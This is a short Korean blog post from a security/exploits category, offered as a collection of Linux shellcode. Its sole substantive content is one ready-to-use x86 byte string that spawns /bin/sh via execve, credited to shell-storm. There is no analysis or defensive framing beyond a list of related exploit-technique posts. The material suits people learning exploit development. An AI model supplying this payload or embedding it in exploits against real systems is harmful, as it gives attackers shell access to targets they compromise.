달력

5

« 2024/5 »

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31

'리눅스 쉘코드 모음'에 해당되는 글 1

  1. 2017.07.06 [Linux] 쉘코드 모음집
2017. 7. 6. 20:29

[Linux] 쉘코드 모음집 Security/Exploits2017. 7. 6. 20:29

1. /bin/sh

지원 버전 : Linux x86

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50

\x53\x89\xe1\xb0\x0b\xcd\x80









References

[1] http://shell-storm.org/shellcode/files/shellcode-827.php

'Security > Exploits' 카테고리의 다른 글

[Windows] 쉘코드 모음집  (0) 2017.07.06
[Linux] 쉘코드 제작 요약 설명  (0) 2017.07.06
[Linux] Heap overflow using unlink - 번역글  (0) 2017.07.06
[Windows] C++ vtable overwrite  (0) 2017.07.05
:
Posted by einai